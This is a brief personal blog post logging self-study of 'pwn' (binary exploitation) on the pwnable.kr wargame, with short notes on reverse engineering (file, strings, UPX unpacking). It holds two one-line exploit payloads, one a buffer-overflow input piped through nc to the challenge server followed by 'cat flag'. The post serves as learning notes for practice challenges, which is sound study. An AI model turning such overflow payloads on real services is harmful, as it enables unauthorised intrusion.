c0ldstudy

Absorb what is useful. Reject what is useless. And add what is essentially your own. --- Bruce Lee

pwn自学

Posted Jun 27, 2017

By Jiacen (Jason) Xu

1 min read

pwn

python -c "print '\x01' * 16 + '\xe8' + '\x05' + '\xD9' + '\x1d'"

第三题 cat <(python -c "print '\xbe\xba\xfe\xca' * 14") - | nc pwnable.kr 9000
1 cat flag

逆向的题目:

     * file filename获得程序是x86还是x64的
     * 使用strings filename | less 获得程序中字符串，判断是否加壳（使用upx）
     * 通过upx -d filename脱壳

CTF

This post is licensed under CC BY 4.0 by the author.